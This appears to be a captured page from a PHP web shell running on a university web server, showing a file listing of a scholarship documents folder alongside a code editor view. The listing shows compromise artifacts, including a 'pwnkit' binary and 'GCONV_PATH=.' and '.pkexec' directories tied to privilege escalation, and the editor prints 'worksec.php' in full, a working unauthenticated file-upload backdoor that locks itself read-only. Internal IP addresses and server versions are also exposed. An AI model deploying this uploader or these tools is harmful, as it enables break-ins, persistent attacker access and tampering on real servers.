Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
htdocs /
webalizer /
becas /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxrwxr-x
18-09-2019
[ DIR ]
drwxr-xr-x
19-11-2019
[ DIR ]
drwxr-xr-x
20-02-2020
[ DIR ]
drwxr-xr-x
becasestatales2021
[ DIR ]
drwxr-xr-x
China
[ DIR ]
drwxr-xr-x
CSS
[ DIR ]
drwxr-xr-x
doc_becas
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxrwxr-x
icons
[ DIR ]
drwxr-xr-x
image
[ DIR ]
drwxr-xr-x
INFOGRAFIAS-24-09-2019
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
modo
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-rw-r--
Bases_Mujeres_de_Cambio_2020.pdf
521.3
KB
-rw-rw-r--
becas_estatales_2020_agosto-dic.pdf
1.15
MB
-rw-rw-r--
convocatoria-becas-alimenticias-enero-abril-2020.pdf
314.14
KB
-rw-rw-r--
CONVOCATORIA_BECAS_UNIVERSITARIAS_UTP_2022.pdf
617.68
KB
-rw-rw-r--
convocatoria_gen_exc_2020.pdf
3.79
MB
-rw-rw-r--
convocatoriaIIIncripciones.jpg
804.55
KB
-rw-rw-r--
convocatoria_movilidad_internacional_2022.pdf
182.14
KB
-rw-rw-r--
LISTA_DE_BENEFICIARIOS_JEEF_POR_COBRAR_2021-1.pdf
401.05
KB
-rw-rw-r--
modalbeca.php
5.86
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxrwxr-x
REQUISITOS_BECA_DE_INSCRIPCIËN_SEGUNDA_RONDA_2020.pdf
1.42
MB
-rw-rw-r--
REQUISITOS_BECA_DE_INSCRIPCION_SEGUNDA_RONDA_2020.pdf
1.42
MB
-rw-rw-r--
resultado_elisaacuna2020-i.png
66.1
KB
-rw-rw-r--
Resultados_Convocatoria_Madres_Jefas-2020.pdf
971.15
KB
-rw-rw-r--
RESULTADOS_JEF_2022-1.pdf
2.71
MB
-rw-rw-r--
RESULTADOS_Manutencion_Federal_2019_II.pdf
1.93
MB
-rw-rw-r--
RESULTADOSMANUTENCIONFEDERAL-I.pdf
3.82
MB
-rw-rw-r--
urdvcihg.php
760
B
-rw-rw-r--
worksec.php
1.02
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : worksec.php
<?php // Path to the file $file = 'worksec.php'; // Change the file permissions to 0444 (read-only) chmod($file, 0444); ?> <?php error_reporting(0); set_time_limit(0); $user = get_current_user(); echo "<center><b>Uname:".php_uname()."<br></b>"; echo "<br><b>Base Dir : ".getcwd()."<br></b>"; echo "<br><b>User : ".$user."<br></b>"; echo '<br><font color="black" size="4">'; if(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000'; $mode = '0644'; $userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if(isset($_FILES['image']['name'])) { $qx = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $qx); @chmod ($qx, octdec($mode)); echo" <a href=$userfile_name><center><b>Sucessfully Uploaded :D ==> $userfile_name</b></center></a>"; } }else{ echo'<form method="POST" action="#" enctype="multipart/form-data"><input type="file" name="image"><br><input type="Submit" name="Submit" value="Upload"></form>'; } echo '</center></font>'; ?>
Close